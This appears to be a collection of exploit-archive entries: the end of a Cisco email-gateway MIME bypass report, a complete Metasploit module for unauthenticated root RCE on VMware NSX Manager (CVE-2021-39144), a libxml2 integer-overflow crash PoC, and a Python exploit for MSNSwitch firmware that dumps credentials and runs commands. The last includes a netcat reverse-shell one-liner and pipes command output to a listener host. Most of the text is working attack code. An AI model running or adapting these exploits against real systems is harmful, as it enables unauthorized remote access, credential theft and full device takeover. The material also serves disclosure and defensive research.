similar lines skipped ...] =00= =00= =00= =00= --boundary_ef5dcd26-- ----------------------- end example ----------------------- Affected Systems: This exploit was successfully tested with a zip file containing the Eicar test virus and Cisco Secure Email Gateways with AsyncOS 14.2.0-620, 14.0.0-698, and others. Affected Email Clients were Vivaldi 5.5.2805.42 (64-bit) and Mutt 2.1.4-1ubuntu1.1. References ---------- Code employing the methods presented here and many similar techniques to manipulate MIME encoding can be found on GitHub: https://github.com/noxxi/mime-is-broken Cisco has published an advisory with a workaround facilitating an undocumented feature of the gateway that can be used to block incorrect MIME. This mitigates many cases of the test suite from GitHub, but not all, particularly not the ones presented in this report. URL: https://bst.cloudapps.cisco.com/bugsearch/bug/CSCwc34679 End of the report. </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'VMware NSX Manager XStream unauthenticated RCE', 'Description' => %q{ VMware Cloud Foundation (NSX-V) contains a remote code execution vulnerability via XStream open source library. VMware has evaluated the severity of this issue to be in the Critical severity range with a maximum CVSSv3 base score of 9.8. Due to an unauthenticated endpoint that leverages XStream for input serialization in VMware Cloud Foundation (NSX-V), a malicious actor can get remote code execution in the context of 'root' on the appliance. VMware Cloud Foundation 3.x and more specific NSX Manager Data Center for vSphere up to and including version 6.4.13 are vulnerable to Remote Command Injection. This module exploits the vulnerability to upload and execute payloads gaining root privileges. }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die-gr3y', # metasploit module author 'Sina Kheirkhah', # Security researcher (Source Incite) 'Steven Seeley' # Security researcher (Source Incite) ], 'References' => [ ['CVE', '2021-39144'], ['URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0027.html'], ['URL', 'https://kb.vmware.com/s/article/89809'], ['URL', 'https://srcincite.io/blog/2022/10/25/eat-what-you-kill-pre-authenticated-rce-in-vmware-nsx-manager.html'], ['URL', 'https://attackerkb.com/topics/ngprN6bu76/cve-2021-39144'] ], 'DisclosureDate' => '2022-10-25', 'Platform' => ['unix', 'linux'], 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], 'Privileged' => true, 'Targets' => [ [ 'Unix (In-Memory)', { 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Type' => :in_memory, 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } } ], [ 'Linux Dropper', { 'Platform' => 'linux', 'Arch' => [ARCH_X64], 'Type' => :linux_dropper, 'CmdStagerFlavor' => [ 'curl', 'printf' ], 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' } } ] ], 'DefaultTarget' => 0, 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true }, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK] } ) ) end def check_nsx_v_mgr return send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, 'login.jsp') }) rescue StandardError => e elog("#{peer} - Communication error occurred: #{e.message}", error: e) fail_with(Failure::Unknown, "Communication error occurred: #{e.message}") end def execute_command(cmd, _opts = {}) b64 = Rex::Text.encode_base64(cmd) random_uri = rand_text_alphanumeric(4..10) xml_payload = <<~XML <sorted-set> <string>foo</string> <dynamic-proxy> <interface>java.lang.Comparable</interface> <handler class="java.beans.EventHandler"> <target class="java.lang.ProcessBuilder"> <command> <string>bash</string> <string>-c</string> <string>echo #{b64} &#x7c; base64 -d &#x7c; bash</string> </command> </target> <action>start</action> </handler> </dynamic-proxy> </sorted-set> XML return send_request_cgi({ 'method' => 'PUT', 'ctype' => 'application/xml', 'uri' => normalize_uri(target_uri.path, 'api', '2.0', 'services', 'usermgmt', 'password', random_uri), 'data' => xml_payload }) rescue StandardError => e elog("#{peer} - Communication error occurred: #{e.message}", error: e) fail_with(Failure::Unknown, "Communication error occurred: #{e.message}") end # Checking if the target is potential vulnerable checking the http title "VMware Appliance Management" # that indicates the target is running VMware NSX Manager (NSX-V) # All NSX Manager (NSX-V) unpatched versions, except for 6.4.14, are vulnerable def check print_status("Checking if #{peer} can be exploited.") res = check_nsx_v_mgr return CheckCode::Unknown('No response received from the target!') unless res html = res.get_html_document html_title = html.at('title') if html_title.nil? || html_title.text != 'VMware Appliance Management' return CheckCode::Safe('Target is not running VMware NSX Manager (NSX-V).') end CheckCode::Appears('Target is running VMware NSX Manager (NSX-V).') end def exploit case target['Type'] when :in_memory print_status("Executing #{target.name} with #{payload.encoded}") execute_command(payload.encoded) when :linux_dropper print_status("Executing #{target.name}") execute_cmdstager end end end </code></pre>

<pre><code>libxml2: Integer overflow in xmlParseNameComplex libxml2 is vulnerable to an integer overflow in `xmlParseNameComplex` when an attribute list has a very long name (name is >= 2**32 characters). ``` static const xmlChar *xmlParseNameComplex(xmlParserCtxtPtr ctxt) { int len = 0, l; [...] return (xmlDictLookup(ctxt->dict, ctxt->input->cur - len, len)); } ``` If the name is greater than or equal to 2**32 characters, then `len` overflows. The calculation for the second argument to xmlDictLookup (`ctxt->input->cur - len`) will point to an address outside of the buffer such as adding 0x80000000 to `cur`. Exploiting this issue using static XML requires that the `XML_PARSE_HUGE` flag is used to disable hardcoded parser limits. Though similar to Felix’s report [$CVE-2022-29824$](https://gitlab.gnome.org/GNOME/libxml2/-/issues/351) it may be possible to trigger without the flag using XSLT or xpath though I didn’t look into this. _Note: XML_PARSE_HUGE looks very brittle in general. Signed 32-bit integers are widely used as sizes/offsets throughout the codebase, a lot of the helper functions don’t handle inputs larger than 4GB correctly and fuzzers won’t trigger these edge cases. Maybe that flag should include a security warning? Some security critical projects like xmlsec enable it by default (https://github.com/lsh123/xmlsec/commit/3786af10953630cd2bb2b57ce31c575f025048a8) which seems risky._ Proof of Concept: ``` $ python3 -c 'print("<!DOCTYPE doc [\n<!ATTLIST src " + "a"*(0x80000000) + " IDREF #IMPLIED>")' > name_big.xml $ ./xmllint --huge /tmp/name_big.xml Program received signal SIGSEGV, Segmentation fault. __strlen_evex () at ../sysdeps/x86_64/multiarch/strlen-evex.S:77 77 ../sysdeps/x86_64/multiarch/strlen-evex.S: No such file or directory. (gdb) bt #0 __strlen_evex () at ../sysdeps/x86_64/multiarch/strlen-evex.S:77 #1 0x00007ffff7e3a374 in xmlDictLookup (dict=0x421a50, name=0x7ffff795602e <error: Cannot access memory at address 0x7ffff795602e>, len=-2147483648) at /usr/local/google/home/maddiestone/libxml2/dict.c:878 #2 0x00007ffff7e6607a in xmlParseNameComplex (ctxt=0x421750) at /usr/local/google/home/maddiestone/libxml2/parser.c:3617 #3 0x00007ffff7e65395 in xmlParseName (ctxt=0x421750) at /usr/local/google/home/maddiestone/libxml2/parser.c:3682 #4 0x00007ffff7e6f27e in xmlParseAttributeListDecl (ctxt=0x421750) at /usr/local/google/home/maddiestone/libxml2/parser.c:6729 #5 0x00007ffff7e71a00 in xmlParseMarkupDecl (ctxt=0x421750) at /usr/local/google/home/maddiestone/libxml2/parser.c:7754 #6 0x00007ffff7e79ed1 in xmlParseInternalSubset (ctxt=0x421750) at /usr/local/google/home/maddiestone/libxml2/parser.c:9407 #7 0x00007ffff7e79a16 in xmlParseDocument (ctxt=0x421750) at /usr/local/google/home/maddiestone/libxml2/parser.c:12165 #8 0x00007ffff7e819fe in xmlDoRead (ctxt=0x421750, URL=0x0, encoding=0x0, options=4784128, reuse=0) at /usr/local/google/home/maddiestone/libxml2/parser.c:17044 #9 0x00007ffff7e81ad7 in xmlReadFile (filename=0x7fffffffdec7 "../qname_big.xml", encoding=0x0, options=4784128) at /usr/local/google/home/maddiestone/libxml2/parser.c:17109 #10 0x000000000040a135 in parseAndPrintFile (filename=0x7fffffffdec7 "../qname_big.xml", rectxt=0x0) at /usr/local/google/home/maddiestone/libxml2/xmllint.c:2366 #11 0x0000000000407574 in main (argc=3, argv=0x7fffffffdac8) at /usr/local/google/home/maddiestone/libxml2/xmllint.c:3757 (gdb) up #1 0x00007ffff7e3a374 in xmlDictLookup (dict=0x421a50, name=0x7ffff795602e <error: Cannot access memory at address 0x7ffff795602e>, len=-2147483648) at /usr/local/google/home/maddiestone/libxml2/dict.c:878 878 l = strlen((const char *) name); (gdb) up #2 0x00007ffff7e6607a in xmlParseNameComplex (ctxt=0x421750) at /usr/local/google/home/maddiestone/libxml2/parser.c:3617 3617 return (xmlDictLookup(ctxt->dict, ctxt->input->cur - len, len)); (gdb) p/x len $5 = 0x80000000 (gdb) p/x $_siginfo $6 = {si_signo = 0xb, si_errno = 0x0, si_code = 0x1, _sifields = {_pad = {0xf795602e, 0x7fff, 0x0 <repeats 26 times>}, _kill = {si_pid = 0xf795602e, si_uid = 0x7fff}, _timer = {si_tid = 0xf795602e, si_overrun = 0x7fff, si_sigval = {sival_int = 0x0, sival_ptr = 0x0}}, _rt = {si_pid = 0xf795602e, si_uid = 0x7fff, si_sigval = {sival_int = 0x0, sival_ptr = 0x0}}, _sigchld = {si_pid = 0xf795602e, si_uid = 0x7fff, si_status = 0x0, si_utime = 0x0, si_stime = 0x0}, _sigfault = {si_addr = 0x7ffff795602e, _addr_lsb = 0x0, _addr_bnd = {_lower = 0x0, _upper = 0x0}}, _sigpoll = { si_band = 0x7ffff795602e, si_fd = 0x0}}} (gdb) p/x ctxt->input->cur $7 = 0x7fff7795602e ``` Related CVE Numbers: CVE-2022-29824,CVE-2022-40303. Found by: Google Security Research </code></pre>

<pre><code>Exploit Title: MSNSwitch Firmware MNT.2408 - Remote Code Exectuion (RCE) Google Dork: n/a Date:9/1/2022 Exploit Author: Eli Fulkerson Vendor Homepage: https://www.msnswitch.com/ Version: MNT.2408 Tested on: MNT.2408 firmware CVE: CVE-2022-32429 #!/usr/bin/python3 """ POC for unauthenticated configuration dump, authenticated RCE on msnswitch firmware 2408. Configuration dump only requires HTTP access. Full RCE requires you to be on the same subnet as the device. """ import requests import sys import urllib.parse import readline import random import string # listen with "ncat -lk {LISTENER_PORT}" on LISTENER_HOST LISTENER_HOST = "192.168.EDIT.ME" LISTENER_PORT = 3434 # target msnswitch TARGET="192.168.EDIT.ME2" PORT=80 USERNAME = None PASSWORD = None """ First vulnerability, unauthenticated configuration/credential dump """ if USERNAME == None or PASSWORD == None: # lets just ask hack_url=f"http://{TARGET}:{PORT}/cgi-bin-hax/ExportSettings.sh" session = requests.session() data = session.get(hack_url) for each in data.text.split('\n'): key = None val = None try: key = each.strip().split('=')[0] val = each.strip().split('=')[1] except: pass if key == "Account1": USERNAME = val if key == "Password1": PASSWORD = val """ Second vulnerability, authenticated command execution This only works on the local lan. for full reverse shell, modify and upload netcat busybox shell script to /tmp: shell script: rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.X.X 4242 >/tmp/f download to unit: /usr/bin/wget http://192.168.X.X:8000/myfile.txt -P /tmp ref: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md#netcat-busybox """ session = requests.session() # initial login, establishes our Cookie burp0_url = f"http://{TARGET}:{PORT}/goform/login" burp0_headers = {"Cache-Control": "max-age=0", "Upgrade-Insecure-Requests": "1", "Origin": f"http://{TARGET}", "Content-Type": "application/x-www-form-urlencoded", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Referer": "http://192.168.120.17/login.asp", "Accept-Encoding": "gzip, deflate", "Accept-Language": "en-US,en;q=0.9", "Connection": "close"} burp0_data = {"login": "1", "user": USERNAME, "password": PASSWORD} session.post(burp0_url, headers=burp0_headers, data=burp0_data) # get our csrftoken burp0_url = f"http://{TARGET}:{PORT}/saveUpgrade.asp" data = session.get(burp0_url) csrftoken = data.text.split("?csrftoken=")[1].split("\"")[0] while True: CMD = input('x:') CMD_u = urllib.parse.quote_plus(CMD) filename = ''.join(random.choice(string.ascii_letters) for _ in range(25)) try: hack_url = f"http://{TARGET}:{PORT}/cgi-bin/upgrade.cgi?firmware_url=http%3A%2F%2F192.168.2.1%60{CMD_u}%7Cnc%20{LISTENER_HOST}%20{LISTENER_PORT}%60%2F{filename}%3F&csrftoken={csrftoken}" session.get(hack_url, timeout=0.01) except requests.exceptions.ReadTimeout: pass </code></pre>